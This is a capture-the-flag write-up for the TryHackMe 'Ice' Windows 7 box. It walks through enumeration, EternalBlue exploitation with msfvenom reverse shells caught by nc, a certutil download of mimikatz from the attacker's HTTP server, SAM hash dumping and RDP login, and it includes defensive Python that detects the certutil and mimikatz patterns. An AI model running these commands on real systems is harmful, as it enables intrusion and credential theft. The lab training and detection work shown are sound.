Ice (THM)

!!!!!!!redo with buffer overflow exploit

TryHackMe Ice Write-Up

topics: Vulnerability scanning, Public exploits, Windows Privilege Escalation, Post-Exploitation, Cracking hashes

  1. Plan

  2. Enumeration

  3. System Privilege Escalation (Exploitation)

  4. Locating Admin Credentials

new tools: mimikatz, certutil

tools: nmapAutomator, dirsearch, python, nc, RDP, hashes.com, gobuster

Plan

This room is a walkthrough that uses Metasploit. I will not be following the walkthrough or using Metasploit.

Enumeration

Initial nmap scan: ./nmapAutomator.sh $ip Basic

Many potential attack vectors here. Port 135 (msrpc, Microsoft Remote Procedure Call) is open; it is used when a host wants to connect to an RPC service. Ports 139 and 445 are open running SMB, used for file sharing. We also have two ports running HTTP; let's run dirsearch and gobuster against those first before inspecting the other attack vectors.

python3 dirsearch.py -u $ip -e php,html,txt

Navigating to /status.xsl confirms that the platform the website is using is Icecast.

gobuster dir -u http://10.10.154.230/secret -w /usr/share/dirb/wordlists/common.txt

There are many visible and hidden subdirectories on these two ports; however, there is nothing of value on initial inspection other than that the website on port 8000 is running the Icecast service. Let's enumerate ports 135, 139 and 445 next.

We can run a Samba scan using nmap: nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>

The IPC$ share allows Anonymous login and read access, so we can attempt to view sensitive files by logging in: smbclient //<ip>/IPC$

Unfortunately, because root owns this share, this is the only thing we can do. Attempting to ls files or run any other useful command results in an error. The same applies to using smbget -R smb://<ip>/IPC$

It appears that we will not be able to gain access through information found on either SMB port. Let's use the only information we have, Icecast, to search for vulnerabilities and exploits.

nmap --script vuln $ip or ./nmapAutomator.sh $ip Vulns

Because this system is Windows 7 and uses SMBv1, it is vulnerable to EternalBlue (MS17-010).

searchsploit Icecast

There are several exploits we can use to gain initial access, but first we must discover which version of Icecast we are dealing with.

There is nothing in the source code of the main page that indicates a version, nor is there any version on the /status.xsl page. Process of elimination seems to be the only method for exploiting this box. We should automatically rule out versions 1.x and attempt to use 2.x or 2.0.1. I will attempt to use exploit 568, as I cannot determine another method of discovering the version.

Attempting to compile with x86_64-w64-mingw32-gcc ice.c -shared -o ice or with gcc -Wall ice.c -o ice produces many compile errors, both on Kali 2020 and Kali 2018. Per the exploit notes, we would simply compile, run the program with $ip as an argument and listen with nc on port 9999. Reading through the program, there is nothing that we need to change, so I'm unsure what the problem is. In order to manually exploit this, we would have to convert the Metasploit module to Python. This has been done per another write-up I found, but we can just try using EternalBlue instead.

System Privilege Escalation

This did not work on Kali 2020, so I used Kali 2018 for this. I'm assuming the Python scripts are written for Python 2.7. Download the git repo and run:

python eternalblue_checker.py <ip>

cd shellcode && ./shell_prep.sh

would you like to auto generate a reverse shell with msfvenom? (Y/n) : Y
LHOST : <attacker ip>
LPORT x64 : 8888
LPORT x86 : 9999
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell : 1
Type 0 to generate a staged payload or 1 to generate a stageless payload : 1

Listen with nc on both ports and run the exploit:

nc -l -p 8888 -s <attackerLocalIP>
nc -l -p 9999 -s <attackerLocalIP>
python eternalblue_exploit7.py <ip> shellcode/sc_all.bin

We know RDP is open on this machine, so let's try to find some admin credentials.

Locating Admin Credentials

We can use mimikatz to find credentials in memory. Mimikatz is a post-exploitation tool that dumps passwords from memory, as well as hashes, PINs and Kerberos tickets.

Start a Python web server and transfer mimikatz (find it with locate mimikatz | grep exe) to the victim with certutil:

python -m SimpleHTTPServer 80
certutil.exe -urlcache -f http://10.10.187.220/mimikatz.exe mimikatz.exe
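The certutil -urlcache download above is exactly the pattern a defender looks for, since it is the usual way a tool like mimikatz lands on a host. As an added example (not part of the original write-up), the following Python flags that pattern, and any mimikatz invocation, in constructed process-creation records loosely modelled on Sysmon Event ID 1 fields (the field names and sample records are assumptions):

```python
import re

# Constructed sample process-creation records (not from the write-up), shaped
# loosely like Sysmon Event ID 1 fields. Record 0 mirrors the transfer step
# above; record 1 is benign certutil use; record 3 is unrelated activity.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -f http://10.10.187.220/mimikatz.exe mimikatz.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -verify signed.cer",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Users\Dark\mimikatz.exe",
     "CommandLine": "mimikatz.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# certutil's cache/URL switches combined with an http(s) URL indicate a file
# download rather than certificate work; -decode is the companion trick for
# unpacking a base64 payload after transfer.
CERTUTIL_DOWNLOAD = re.compile(r"-(urlcache|verifyctl)\b.*https?://", re.I)
CERTUTIL_DECODE = re.compile(r"-decode\b", re.I)
# Binary name or module prefixes seen in mimikatz command lines (e.g. lsadump::).
MIMIKATZ_HINT = re.compile(r"mimikatz|sekurlsa::|lsadump::", re.I)


def classify(event):
    """Return the list of alert tags raised by one process-creation event."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    tags = []
    if image.endswith("certutil.exe"):
        if CERTUTIL_DOWNLOAD.search(cmd):
            tags.append("certutil_download")
        if CERTUTIL_DECODE.search(cmd):
            tags.append("certutil_decode")
    if MIMIKATZ_HINT.search(cmd) or MIMIKATZ_HINT.search(image):
        tags.append("credential_dumper")
    return tags


def scan(events):
    """Return (index, tags) for every event that raised at least one tag."""
    hits = []
    for i, event in enumerate(events):
        tags = classify(event)
        if tags:
            hits.append((i, tags))
    return hits
```

Record 0 raises both tags because the URL fetch names mimikatz.exe; record 2 raises only the credential-dumper tag, and the benign certutil -verify record raises none.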

mimikatz.exe

lsadump::sam (see the mimikatz reference page)

We can crack Dark's password with hashes.com.

RDP into the machine using Remmina with the creds Dark:Password01!
